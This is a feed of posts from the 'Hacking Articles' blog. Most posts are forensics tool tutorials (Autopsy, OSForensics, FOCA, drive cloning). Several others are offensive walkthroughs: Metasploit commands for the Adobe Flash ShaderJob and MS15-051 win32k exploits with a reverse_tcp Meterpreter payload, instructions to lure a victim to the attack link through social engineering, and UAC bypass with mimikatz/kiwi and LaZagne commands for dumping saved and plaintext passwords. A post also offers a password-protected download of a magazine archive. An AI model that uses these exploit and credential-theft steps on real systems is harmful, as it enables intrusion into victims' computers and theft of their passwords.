Channel: Hacking Articles

How to Install Digital Forensics Framework in System

DFF (Digital Forensics Framework) is a free and Open Source computer forensics software built on top of a dedicated Application Programming Interface (API).

It can be used by both professionals and non-experts to quickly and easily collect, preserve and reveal digital evidence without compromising systems and data.

To install DFF (Digital Forensics Framework), first install Python from the link given below.

Python from Here.

Install PyQt4 from Here. Both are prerequisites for DFF.

Now click on I Agree Option

Select the type of install & click on Next.

Choose Python Installation Folder & click on Install.

Now Install DFF from Here & click on Next.

Click on I Agree to proceed Further.

Now choose the Destination Folder to install DFF & click on Next.

Now Choose Start Menu Folder & Click on Install.

Click on Finish to complete the installation.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with a high level of expertise in handling server-side operations on the Windows platform. An experienced IT Technical Trainer with over 20 years’ experience. You can contact him at mukul@ignitetechnologies.in

The post How to Install Digital Forensics Framework in System appeared first on Hacking Articles.


Live Forensics Case Investigation using Autopsy

First download Autopsy from here and install it on your PC. Click the ‘Create a New Case’ option.

A new page will open. Enter the details in ‘Case Name’ and ‘Base Directory’ and choose the location to save the report, e.g. c:\users\raj\desktop\auto. Then click on Next to proceed to the next step.

In the next step, enter the case number and examiner details and click on Finish to proceed.

A new window will open. In Step 1 it will ask you to add a data source. Select the source type to add, browse to the file path and click on Next to proceed further.

In Step 2, Configure Ingest Modules, I have chosen all the modules as I am looking for complete information on the evidence device, disk or system. Click Next to proceed further.

In Add Data Source, just click on Finish to generate the report of the device; you can then perform a complete investigation of the victim device, system or any other disk. It will process the data source and add it to the local database.

After processing completes, it will show the Forensic Investigation Report. Now click on the Devices Attached option; it will show the list of devices attached to the system.

Now click on EXIF Metadata (Exchangeable image file format for images, sound used by Digital Camera, Smartphone and scanner). It will show the image files.

Now click on Installed Programs to see all the installed programs in the system.

Click Operating System Information. It will show the entire operating system list.

Now select the Operating System User Account option. It will display the names of all the user accounts.

Now click on Recent Documents Option, it will display latest created or opened documents.

Click Web Bookmarks Option to see all the bookmarks by system users in different browsers.

To see web cookies, select web cookies option.

To See Web Downloads, Click on Web Downloads option.

To check internet History, click on Web History Option.

To see the history of internet search, click on Web Search Option.

To see the list of all email ids in the system, click on email address.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with a high level of expertise in handling server-side operations on the Windows platform. An experienced IT Technical Trainer with over 20 years’ experience. You can contact him at mukul@ignitetechnologies.in

The post Live Forensics Case Investigation using Autopsy appeared first on Hacking Articles.

Free Download Hakin9 Magazine 2005 To 2013 Full Collection

Hakin9 is a Polish online publication on IT Security. The magazine also features some articles in English, German and French. A limited number of free articles are available on their web site. The full version of the magazine is available online to subscribers.
Hakin9 is a source of news and information about offensive hacking methods as well as ways of securing systems, networks and applications.

Hakin9’s first edition was released in 2005, then after a few-month-long break the real editing process started in September 2006.

2005
Hakin9 (01_2005) – Cisco IOS Insecurity.pdf
Hakin9 (02_2005) – Vulnerable Mobiles.pdf
Hakin9 (03_2005) – Snooping On Monitor Displays.pdf
Hakin9 (04_2005) – Hacking BlueTooth.pdf
Hakin9 (05_2005) – Anatomy of Pharming.pdf

2006
Hakin9 (01_2006) – Rootkits Under Windows.pdf
Hakin9 (02_2006) – Fighting Malicious Code.pdf

2007
Hakin9 (01_2007) – Taking Control of a Running Process.pdf
Hakin9 (02_2007) – Timing Attacks.pdf
Hakin9 (03_2007) – Haking Oracle.pdf
Hakin9 (04_2007) – Haking Microsoft’s .Net.pdf
Hakin9 (05_2007) – Online Fraud Danger.pdf
Hakin9 (06_2007) – Rootkits For Windows.pdf
Hakin9 STARTER_KIT (01_2007) – Searching For Google’s Secrets.pdf
Hakin9 STARTER_KIT (02_2007) – Knock Knock Knocking.pdf
Hakin9 STARTER_KIT (03_2007) – Exploiting Software.pdf

2008
Hakin9 (01_2008) – No Backdoor Try Opening The Windows.pdf
Hakin9 (02_2008) – VOIP Abuse.pdf
Hakin9 (03_2008) – LDAP Cracking.pdf
Hakin9 (04_2008) – File Inclusion Attacks.pdf
Hakin9 (05_2008) – Kernal Hacking.pdf
Hakin9 (06_2008) – Hacking WiFi.pdf

2009
Hakin9 (01_2009) – Haking Instant Messenger.pdf
Hakin9 (02_2009) – The Real World Click Jacking.pdf
Hakin9 (03_2009) – Breaking Client-Side Certificate Protection.pdf
Hakin9 (04_2009) – My ERP Got Hacked.pdf
Hakin9 (05_2009) – 21st Century Hacking Techniques.pdf
Hakin9 (06_2009) – Windows FE.pdf
Hakin9 TBO (01_2009).pdf

2010
Hakin9 (1_2010) -Hardware Keylogger A Serious Threat.pdf
Hakin9 (2_2010) – Mobile Exploitation.pdf
Hakin9 (3_2010) – Analyzing Malware and Malicious Content.pdf
Hakin9 (4_2010) – Flash Memory Mobile Forensic.pdf
Hakin9 (5_2010) – Is DDOS Still A Threat.pdf
Hakin9 (6_2010) – Securing VOIP.pdf
Hakin9 (7_2010) – Securing The Cloud.pdf
Hakin9 (8_2010) – Mobile Malware The New Cyber Threat.pdf
Hakin9 (9_2010) – Email Security.pdf
Hakin9 (10_2010) – Spyware.pdf
Hakin9 (11_2010) – Botnets, Malware, Spyware How to Fight Back.pdf
Hakin9 STARTER_KIT (01_2010) – Snort Exposed.pdf
Hakin9 TBO (01_2010).pdf

2011
Hakin9 (01_2011) – Cybercrime and Cyber War Predictions for 2011.pdf
Hakin9 (02_2011) – Network Security.pdf
Hakin9 (03_2011) – ID Theft.pdf
Hakin9 (04_2011) – Mobile Security.pdf
Hakin9 (05_2011) – Cloud Security.pdf
Hakin9 (06_2011) – Insecure Access Control.pdf
Hakin9 (07_2011) – Web App Security.pdf
Hakin9 (08_2011) – Hackin RFID.pdf
Hakin9 (09_2011) – Secure Coding.pdf
Hakin9 (10_2011) – Hack Apple.pdf
Hakin9 (11_2011) – Hacking Data.pdf
Hakin9 (12_2011) – TOR Project.pdf

Hakin9 Exploiting Software
Hakin9 EXPLOITING_SOFTWARE (01_2011) – Smashing The Stack.pdf
Hakin9 EXPLOITING_SOFTWARE (02_2011) – Exploit Format Strings With Python.pdf
Hakin9 EXPLOITING_SOFTWARE (03_2011) – Password What Password.pdf
Hakin9 EXPLOITING_SOFTWARE (04_2011) – ShellCode.pdf

Hakin9 Extra
Hakin9 EXTRA (01_2011) – Exploiting Software.pdf
Hakin9 EXTRA (02_2011) – ID Thefts.pdf
Hakin9 EXTRA (03_2011) – Forensics.pdf
Hakin9 EXTRA (04_2011) – Android Security.pdf
Hakin9 EXTRA (04_2011) – Wireless Security.pdf
Hakin9 EXTRA (05_2011) – Haking Botnet.pdf
Hakin9 EXTRA (06_2011) – Rootkit.pdf

Hakin9 Mobile Security
Hakin9 MOBILE SECURITY (01_2011) – IOS Vulnerability.pdf

Hakin9 Starter Kit
Hakin9 STARTER_KIT (01_2011) – Paypal Is A Scam.pdf
Hakin9 STARTER_KIT (02_2011) – Termination The Internet.pdf

2012
Hakin9 (01_2012) – SQL Injection.pdf
Hakin9 (02_2012) – When I’m X64.pdf
Hakin9 (03_2012) – DNS Cache Poisoning.pdf
Hakin9 (04_2012) – Cyber Warfare.pdf
Hakin9 (05_2012) – Cloud Computing.pdf
Hakin9 (06_2012) – Biometrics.pdf
Hakin9 (07_2012) – GreenSQL.pdf
Hakin9 (08_2012) – Malware.pdf
Hakin9 (09_2012) – Network Security.pdf
Hakin9 (10_2012) – Hacking Oracle.epub
Hakin9 (10_2012) – Hacking Oracle.pdf
Hakin9 (11_2012) – Mobile Security.epub
Hakin9 (11_2012) – Mobile Security.pdf
Hakin9 (12_2012) – Enterprise Network Security.epub

Hakin9 Exploiting Software
Hakin9 EXPLOITING_SOFTWARE (10_2012) – A Manual To Reverse Engineer
Hakin9 EXPLOITING_SOFTWARE – Bible.pdf
Hakin9 EXPLOITING_SOFTWARE (01_2012) – Blackhole Exploint Kit.pdf
Hakin9 EXPLOITING_SOFTWARE (02_2012) – Hardening of Java Applications Against AOP.pdf
Hakin9 EXPLOITING_SOFTWARE (03_2012) – Security Onion.pdf
Hakin9 EXPLOITING_SOFTWARE (04_2012) – Cisco IOS Rootkits and Malware.pdf
Hakin9 EXPLOITING_SOFTWARE (05_2012) – Buffer Overflow.pdf
Hakin9 EXPLOITING_SOFTWARE (06_2012) – Pentesting With Android.pdf
Hakin9 EXPLOITING_SOFTWARE (07_2012) – SamuraiWTF Toolkit.pdf
Hakin9 EXPLOITING_SOFTWARE (08_2012) – Raspberry Pi Hacking.pdf
Hakin9 EXPLOITING_SOFTWARE (09_2012) – Metasploit In A Nutshell.epub
Hakin9 EXPLOITING_SOFTWARE (09_2012) – Metasploit In A Nutshell.pdf

Hakin9 Extra
Hakin9 EXTRA (01_2012) – Cryptography.pdf
Hakin9 EXTRA (02_2012) – Honeypots.pdf
Hakin9 EXTRA (03_2012) – Hacking Hardware.pdf
Hakin9 EXTRA (04_2012) – Forensics In The Cloud.pdf
Hakin9 EXTRA (05_2012) – Adobe Security.pdf
Hakin9 EXTRA (06_2012) – Timing Attacks.pdf
Hakin9 EXTRA (07_2012) – Quantum Computing.pdf
Hakin9 EXTRA (08_2012) – Helix.pdf
Hakin9 EXTRA (09_2012) – Webserver Security.pdf
Hakin9 EXTRA (10_2012) – How To Boost Your Cloud.pdf
Hakin9 EXTRA (11_2012) – Biometrics Security.epub
Hakin9 EXTRA (11_2012) – Biometrics Security.pdf

Hakin9 Mobile Security
Hakin9 MOBILE_SECURITY (01_2012) – Tag You’re Infected.pdf
Hakin9 MOBILE_SECURITY (02_2012) – Data Handling On IOS Devices.pdf
Hakin9 MOBILE_SECURITY (03_2012) – Mobile Device Security.pdf

Hakin9 On Demand
Hakin9 ON_DEMAND (01_2012) – SQL Injection.pdf
Hakin9 ON_DEMAND (02_2012) – Torjan-izing USB Stics.pdf
Hakin9 ON_DEMAND (03_2012) – The Guide to Backtrack.pdf
Hakin9 ON_DEMAND (04_2012) – Network Security.pdf
Hakin9 ON_DEMAND (05_2012) – Connection Overload.pdf
Hakin9 ON_DEMAND (06_2012) – Ultimate Nessus 5 Tutorial.pdf
Hakin9 ON_DEMAND (07_2012) – Wireshark Sharks On The Wire.epub
Hakin9 ON_DEMAND (07_2012) – Wireshark Sharks On The Wire.pdf
Hakin9 ON_DEMAND (08_2012) – Exploiting Linux Kernal.epub
Hakin9 ON_DEMAND (08_2012) – Exploiting Linux Kernal.pdf
Hakin9 ON_DEMAND (09_2012) – Wireshark Sharks On The Wire 2.pdf

TBO
Hakin9 TBO (01_2012) – The Ultimate Guide To Mobile Security.pdf
Hakin9 TBO (03_2012) – Best of Network Scanning.pdf

Hakin9 BIBLE (01_2012).pdf
Hakin9 FOR_FREE (01_2012).pdf

2013
Hakin9 (01_2013) – Fight The Spyware.epub
Hakin9 (01_2013) – Fight The Spyware.pdf
Hakin9 (02_2013) – DDOS Tutorials.pdf
Hakin9 (03_2013) – Hacking Android.epub
Hakin9 (03_2013) – Hacking Android.pdf
Hakin9 (04_2013) – A Guide To NMAP The Second Encounter.epub
Hakin9 (04_2013) – A Guide To NMAP The Second Encounter.pdf
Hakin9 (05_2013) – Offensive Programming.epub
Hakin9 (05_2013) – Offensive Programming.pdf
Hakin9 (06_2013) – Advanced Malware Analysis.epub
Hakin9 (06_2013) – Advanced Malware Analysis.pdf
Hakin9 (07_2013) – QR Code Haking.epub
Hakin9 (07_2013) – QR Code Haking.pdf
Hakin9 (08_2013) – C++ Vs Python.epub
Hakin9 (09_2013) – Network Security & SQL Injection.pdf

Hakin9 Exploiting Software
Hakin9 EXPLOITING_SOFTWARE (01_2013) – Exploiting SAP.epub
Hakin9 EXPLOITING_SOFTWARE (01_2013) – Exploiting SAP.pdf
Hakin9 EXPLOITING_SOFTWARE TBO (01_2013) – Metasploit Tutorials.pdf

Hakin9 Extra
Hakin9 EXTRA (01_2013) – Backtrack 5 R3.epub
Hakin9 EXTRA (01_2013) – Backtrack 5 R3.pdf
Hakin9 EXTRA (02_2013) – Mobile Hacking.epub
Hakin9 EXTRA (02_2013) – Mobile Hacking.pdf
Hakin9 EXTRA (03_2013) – Guide To Kali Linux.epub
Hakin9 EXTRA (03_2013) – Guide To Kali Linux.pdf

Hakin9 On Demand
Hakin9 ON_DEMAND (01_2013) – CyberSecurity.epub
Hakin9 ON_DEMAND (01_2013) – CyberSecurity.pdf
Hakin9 ON_DEMAND (02_2013) – Internet Based World Security.epub
Hakin9 ON_DEMAND (02_2013) – Internet Based World Security.pdf
Hakin9 ON_DEMAND (03_2013) – Reverse Engineering Tutorials.pdf
Hakin9 ON_DEMAND (04_2013) – Advanced Web Attacks and Exploitations.epub
Hakin9 ON_DEMAND (04_2013) – Advanced Web Attacks and Exploitations.pdf
Hakin9 ON_DEMAND (05_2013) – Advanced Windows Exploitations.pdf
Hakin9 ON_DEMAND (06_2013) – BIOS Security.epub
Hakin9 ON_DEMAND (06_2013) – BIOS Security.pdf
Hakin9 ON_DEMAND (07_2013) – Exploitation Compendium.epub
Hakin9 ON_DEMAND (07_2013) – Exploitation Compendium.pdf

Hakin9 Open
Hakin9 OPEN (01_2013) – How To Use Metasploit For Security Defense.epub
Hakin9 OPEN (01_2013) – How To Use Metasploit For Security Defense.pdf
Hakin9 OPEN (02_2013) – How To Brute Force Drupal 6 Login Pages.epub
Hakin9 OPEN (02_2013) – How To Brute Force Drupal 6 Login Pages.pdf
Hakin9 OPEN (03_2013) – How To Detect System Intrusion.pdf
Hakin9 OPEN (04_2013) – Cyber Threats Solutions.epub
Hakin9 OPEN (04_2013) – Cyber Threats Solutions.pdf

Hakin9 Starter Kit
Hakin9 STARTER_KIT (01_2013) – Beginners Guide To Hacking
Hakin9 STARTER_KIT (02_2013) – A Beginners Guide To Software Exploitation.pdf
Hakin9 STARTER_KIT (03_2013) – How To Pentest With BackTrack.pdf

Hakin9 TBO
Hakin9 TBO (01_2013) – Wifi Hacking.pdf
Hakin9 TBO (02_2013) – Exploiting Software.pdf
Hakin9 TBO (03_2013) – Advanced Backtrack Set.pdf

Python Triple Pack
Software Developer Journal – Python Programming (12_2013).pdf
Software Developer Journal – Python Starter Kit (13_2013).pdf

Hakin9 Ebooks
Defend Yourself
Nmap Guide
Public Key Cryptostructure
Don’t Be Mocked Secure Your System.pdf
Low Tech Hacking.pdf
Malware – From Basic Cleaning To Anaylsing.pdf

Tutorials
CEHv7 – Study Guide 1.pdf
CEHv7 – Study Guide 2.pdf
CEHv7 – Study Guide 3.pdf
Crypto Tutorial 1.pdf
Crypto Tutorial 2.pdf
Crypto Tutorial 3.pdf
Crypto Tutorial 4.pdf
Metasploit and SET Install on Apple iDevice.pdf

Download

Password: www.hackingarticles.in

The post Free Download Hakin9 Magazine 2005 To 2013 Full Collection appeared first on Hacking Articles.

Comparison of two Files for forensics investigation by Compare IT

Compare It! displays 2 files side by side, with colored difference sections to simplify analysis. You can move changes between files with a single mouse click or keystroke, and of course you can edit files directly in the comparison window. It can make a colored printout of the differences report, exactly as it is on the screen. It supports regular expressions, so you could easily strip XML tags from a file to compare XML with XML or XML with text! While running on all MS Windows variants, Compare It! can compare, merge and save text files from DOS, Windows, UNIX and Mac systems. It can create an HTML report of your results.

First of all, install Compare It from the link given below.

http://www.grigsoft.com/wincmp3.htm

Click on the Compare It tool. It will show a window to select the files to be compared.

Select the first file and click on Open, then select the second file and click on Open.

Now it will show the changes in a highlighted bar.

Now click on View and select Next Change; it will show the next change.

Now click on View and select Changes Only. It will show all the changes simultaneously.

Now click on Merge and select the Separate option. It will separate the changed lines.

Now select the Edit checkbox in the status bar. The cursor will move to the changed line and the text can now be edited.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with a high level of expertise in handling server-side operations on the Windows platform. An experienced IT Technical Trainer with over 20 years’ experience. You can contact him at mukul@ignitetechnologies.in

The post Comparison of two Files for forensics investigation by Compare IT appeared first on Hacking Articles.

CSCU Instructor Slides

CSCU Module 01 Foundations of Security

CSCU Module 02 Securing Operating Systems

CSCU Module 03 Protecting Systems Using Antiviruses

CSCU Module 04 Data Encryption

CSCU Module 05 Data Backup and Disaster Recovery

CSCU Module 06 Internet Security

CSCU Module 07 Securing Network Connections

CSCU Module 08 Securing Online Transactions

CSCU Module 09 Securing Email Communications

CSCU Module 10 Social Engineering and Identity Theft

CSCU Module 11 Security on Social Networking Sites

CSCU Module 12 Information Security and Legal Compliance

CSCU Module 13 Securing Mobile Devices

Download

Password: www.hackingarticles.in

The post CSCU Instructor Slides appeared first on Hacking Articles.

Hacking Ultimate Hacking for Beginners, How to Hack

Extract the metadata Information of Any website using Foca

FOCA (Fingerprinting Organizations with Collected Archives) is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages, and can be downloaded and analyzed with FOCA.

It is capable of analyzing a wide variety of documents, with the most common being Microsoft Office, Open Office, or PDF files, although it also analyzes Adobe InDesign or SVG files, for instance.

First of all, download FOCA from the link given below.

https://www.elevenpaths.com/labstools/foca/index.html

Now click on Project & then select New Project.

Now enter the Project Name, name of the website and name of the folder where we have to save the documents and click on create to proceed further.

Now enter the name of the file where documents will be saved and click on save.

Now it will show Document collecting window, click on Search All option.

Now it will show the list of documents. Now right click on the URL and click on Download to save it in the specified folder.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with a high level of expertise in handling server-side operations on the Windows platform. An experienced IT Technical Trainer with over 20 years’ experience. You can contact him at mukul@ignitetechnologies.in

The post Extract the metadata Information of Any website using Foca appeared first on Hacking Articles.

The Hacker Playbook 2 Practical Guide To Penetration Testing


Forensics Investigation of Deleted Files in a Drive

First of all download the OSForensics from here.

Select Create Signature Option. Click on Config 

Now browse the desired Directory from Directory list management, in my case I am selecting Desktop.

Click on Add to list Option to include the directory. Click OK

Now in the start folder option, it will show the selected drive, i.e. c:\users\raj\desktop. Click on the Start option.

It will ask for the file name; enter the file name & click on Save. The signature for the data drive will now be created.

Now make some modifications in the data drive and repeat the same steps to create another signature after the modifications.

Now click on the Compare Signature option.

Browse to both files, i.e. the Old Signature as well as the New Signature.

Click on the Compare option. It will start the process and then show the files with their modification status as well as their creation and modification dates. We can use the show option to see only modified or deleted files.

Now it will show only deleted or modified files with their creation and deletion date.
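The signature-and-compare workflow above, reduced to its core as an added example (this is not OSForensics code and not part of the original post): a signature is a per-file record of size, modification time and SHA-256, and comparing two signatures classifies each path. The JSON layout, the function names and the sample files built in `demo()` are assumptions made for illustration.

```python
import hashlib
import json
import os
import tempfile


def create_signature(root):
    """Record size, mtime and SHA-256 for every regular file under root."""
    signature = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # skip symlinks and special files
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            entry = {"size": None, "mtime_ns": None, "sha256": None}
            try:
                info = os.stat(full)
                digest = hashlib.sha256()
                with open(full, "rb") as handle:
                    for chunk in iter(lambda: handle.read(1 << 20), b""):
                        digest.update(chunk)
                entry = {"size": info.st_size, "mtime_ns": info.st_mtime_ns,
                         "sha256": digest.hexdigest()}
            except OSError:
                pass  # unreadable file: keep it listed with empty fields
            signature[rel] = entry
    return signature


def save_signature(signature, path):
    """Write the signature to disk so it can be compared later."""
    with open(path, "w", encoding="utf-8") as handle:
        json.dump(signature, handle, indent=2, sort_keys=True)


def load_signature(path):
    with open(path, "r", encoding="utf-8") as handle:
        return json.load(handle)


def compare_signatures(old, new):
    """Classify every path seen in either signature."""
    report = {"created": [], "deleted": [], "modified": [], "timestamp_only": []}
    for rel in sorted(set(old) | set(new)):
        if rel not in old:
            report["created"].append(rel)
        elif rel not in new:
            report["deleted"].append(rel)
        elif old[rel]["sha256"] != new[rel]["sha256"]:
            report["modified"].append(rel)  # content changed, even if size did not
        elif old[rel]["mtime_ns"] != new[rel]["mtime_ns"]:
            report["timestamp_only"].append(rel)  # same bytes, different mtime
    return report


def _write(root, rel, data):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as handle:
        handle.write(data)
    return path


def demo():
    """Constructed sample: sign a directory, change it, sign again, compare."""
    with tempfile.TemporaryDirectory() as work:
        evidence = os.path.join(work, "desktop")
        notes = _write(evidence, "notes.txt", b"meeting at 10")
        _write(evidence, "keep.txt", b"unchanged")
        _write(evidence, "docs/report.txt", b"draft v1")
        old_log = _write(evidence, "docs/old.log", b"to be deleted")

        # Signature files live outside the evidence directory on purpose.
        old_sig = os.path.join(work, "old.sig.json")
        save_signature(create_signature(evidence), old_sig)

        _write(evidence, "docs/report.txt", b"draft v2")  # same size, new content
        os.remove(old_log)
        _write(evidence, "new.txt", b"created later")
        os.utime(notes, (1000000000, 1000000000))  # timestamp change only

        new_sig = os.path.join(work, "new.sig.json")
        save_signature(create_signature(evidence), new_sig)
        return compare_signatures(load_signature(old_sig), load_signature(new_sig))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Because the comparison keys on the hash, an edit that keeps the file size the same is still reported as modified, and a file whose timestamp was altered without touching its content is reported separately.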

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with a high level of expertise in handling server-side operations on the Windows platform. An experienced IT Technical Trainer with over 20 years’ experience. You can contact him at mukul@ignitetechnologies.in

The post Forensics Investigation of Deleted Files in a Drive appeared first on Hacking Articles.

101 Best Forensics Tutorials

Best of Computer Forensics Tutorials

Forensics Investigation of Deleted Files in a Drive

Comparison of two Files for forensics investigation by Compare IT

Live Forensics Case Investigation using Autopsy

How to Install Digital Forensics Framework in System

How to Mount RAW Image and ISO Image as a Drive using OSF Mount

Forensics Investigation of Facebook, Skype, and Browsers in RAW Image using IEF (Internet Evidence Finder)

How to Create Drive Image for Forensic Purpose using Forensic Replicator

Outlook Forensics Investigation using E-Mail Examiner

How to Preserve Forensics Image file Timestamp

How to identify any Suspicious changes to files or directory (Disk Drive Signature)

Forensics Investigation of Evidence RAW Image using OS Forensics Tool

How to Create and Convert RAW Image in Encase and AFF Format using Forensics Imager

How to Mount Forensics image as a Drive using P2 eXplorer Pro

How to Convert Encase, FTK, DD, RAW, VMWare and other image file as Windows Drive

How to gather Forensics Investigation Evidence using ProDiscover Basic

How to study Forensics Evidence of PC using P2 Commander (Part 2)

How to Collect Forensics Evidence of PC using P2 Commander (Part 1)

How to Create Forensics Image of PC using R-Drive Image

Forensic Investigation of victim pc using Autopsy

Forensic Investigation of any Twitter account

How to Perform Forensic Investigation on YouTube

How to perform Forensic Investigation on user Linkedin Account

Forensic Investigation of any FaceBook Profile

How to create copy of Suspects Evidence Using (FTK Imager)

How to find the usage of files in Remote victim PC (Remote PC Forensics)

How to Collect Telephonic Evidence in Victim PC

How to Collect Email Evidence in Victim PC (Email Forensics)

Forensics Analysis of Social Media Sites like Facebook, Twitter, LinkedIn

Forensics Investigation of Remote PC (Part 2)

Forensics Investigation of Remote PC (Part 1)

Volatility – An advanced memory forensics framework

DumpIt – RAM Capture Tool

How to View Last Activity of Your PC

How to view Date & Time of any Captured JPEG Image

Antivirus Forensics Tools

BFT (Browser Forensic Tool )

How to View System Reboot Date and Time

Hacking Computer forensics Exposed

List of Computer Forensics Tools (Part 1)

Find Last Connected USB on your system (USB Forensics)

The post Best of Computer Forensics Tutorials appeared first on Hacking Articles.

Hack Remote Windows PC using Adobe Flash Player ShaderJob Buffer Overflow

This module exploits a buffer overflow vulnerability related to the ShaderJob workings on Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the same Bitmap object as src and destination of the ShaderJob. Modifying the “width” attribute of the ShaderJob after starting the job it’s possible to create a buffer overflow condition where the size of the destination buffer and the length of the copy are controlled. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169, Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169, and Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.

Exploit Targets

Windows 7

Firefox 38.0.5

Adobe Flash 17.0.0.169

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/windows/browser/adobe_flash_shader_job_overflow

msf exploit (adobe_flash_shader_job_overflow)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_shader_job_overflow)>set lhost 192.168.0.160 (IP of Local Host)

msf exploit (adobe_flash_shader_job_overflow)>set srvhost 192.168.0.160

msf exploit (adobe_flash_shader_job_overflow)>set uripath /

msf exploit (adobe_flash_shader_job_overflow)>exploit

Now the URL you should give to your victim is http://192.168.0.160:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.0.160:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim’s command prompt.

The post Hack Remote Windows PC using Adobe Flash Player ShaderJob Buffer Overflow appeared first on Hacking Articles.

How to Clone Drive for Forensics Purpose

DriveClone is a hard disk (HDD) & solid state drive (SSD) cloning and migration software. DriveClone is a time & money saver for server migration, RAID upgrading, and system cloning.

DriveClone automatically clones your entire machine, including system files, applications, preferences, emails, music, photos, movies, documents, and all partitions. But what makes DriveClone different from other disk cloning applications is that it not only clones all data on a system, it automatically defrags all files, removes junk, resizes partitions, and only clones the files that have been changed since the last cloning.

Drive Clone Key Features

  • Keep an exact copy of Hard disk or SSD (new!)
  • Clone different sizes disks
  • Schedule incremental cloning (new!)
  • Near real-time MirrorDrive (new!)
  • Rapid cloning (2X faster) (new!)
  • Partition 4K aligned (new!)
  • Tools to fix boot issues & retain GUID (new!)
  • DriveClone data migration is in Windows
  • Allows user keep working during migration process
  • Cloned disk is immediately bootable
  • Volume and sector-by-sector cloning
  • Smart cloning (unique) saves up to 70GB by excluding temp and redundant files
  • Universal cloning (unique) allows booting on other machine
  • Turn your external hard drive into a Mirror Drive (unique)
  • Factory Recovery Partition Cloning (unique)
  • Keep up to 99 File Versions on Mirror Drive (unique) (MirrorDrive)
  • Defrag Cloning (unique) will increase life-span & performance
  • Directly convert a PC to VMware & Hyper-v virtual machines (unique)
  • Support SecureBoot, GPT, UEFI, and Dynamic Disk (unique)
  • Support all sizes (64GB/128GB/260GB/500GB/750GB/1TB/2TB/4TB or larger)
  • Support all drives (Seagate, WDC, Fujitsu, Hitachi, etc)
  • Raid to Hard disk/SSD cloning and migration; and vice versa

First download DriveClone from here and install it on your PC. Drive Clone Workstation is designed to completely copy all files, applications and the Windows system from one Hard Drive/SSD/Flash to another Hard Drive/SSD/Flash. You can easily clone your Hard Drive/SSD/Flash to a different size SSD drive (smaller or bigger) for better performance. Drive Clone Workstation will automatically adjust and resize partitions during the cloning process to reduce complications.

Start DriveClone Workstation.

Double click on One Time Cloning. Clone Drive/Partition(s) duplicates one hard drive or SSD to another hard drive or SSD, and it is immediately bootable. It eliminates the need of re-installing the operating system, drivers and applications when upgrading to a new hard drive or SSD with only a few mouse clicks.

Now select a Source Disk/Partition and then a Destination Disk/Partition. Click on NEXT to proceed further.

It will Show the window popup. Click on YES to continue.

Now it will show two options i.e. Rapid Cloning and Normal Cloning. Check either Rapid Cloning or Normal Cloning and click on Next.

Select the Start or Previous option. The Previous option is used to modify the current settings, and the Start option is used to proceed further.

Now it will show the One-Time cloning process.

Now it will show the message cloning completed. Click on Finish.

Now select the target drive and it will show the contents of cloned drive.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with a high level of expertise in handling server-side operations on the Windows platform. An experienced IT Technical Trainer with over 20 years’ experience. You can contact him at mukul@ignitetechnologies.in

The post How to Clone Drive for Forensics Purpose appeared first on Hacking Articles.

Hack Saved Password in Windows and Linux PC using LaZagne Project

The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software. At this moment, it supports 22 Programs on Microsoft Windows and 12 on a Linux/Unix-Like OS.

First download LaZagne project from here

To launch all modules, type laZagne.exe all

Launch only a specific module

laZagne.exe browsers

The post Hack Saved Password in Windows and Linux PC using LaZagne Project appeared first on Hacking Articles.

Hack the Password in Plain text of Remote Windows PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you have a remote shell with Metasploit, use the Bypass UAC module, set the session number and exploit it

use exploit/windows/local/bypassuac

msf exploit (bypassuac_injection)>set session 1

msf exploit (bypassuac_injection)>exploit

mimikatz is a tool I’ve made to learn C and make some experiments with Windows security. It’s now well known to extract plaintext passwords, hash, PIN code and kerberos tickets from memory.

Now type load kiwi, then type creds_all

The post Hack the Password in Plain text of Remote Windows PC appeared first on Hacking Articles.


Hack Remote Windows PC using Windows Client Copy Image Win32k Exploit

This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/local/ms15_051_client_copy_image

msf exploit (ms15_051_client_copy_image)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms15_051_client_copy_image)>set lhost 192.168.1.5 (IP of Local Host)

msf exploit (ms15_051_client_copy_image)>set session 1

msf exploit (ms15_051_client_copy_image)>exploit

The post Hack Remote Windows PC using Windows Client Copy Image Win32k Exploit appeared first on Hacking Articles.

Hack Browsers, Chat, Databases, Mails, Wifi Password in Remote Windows or Linux PC

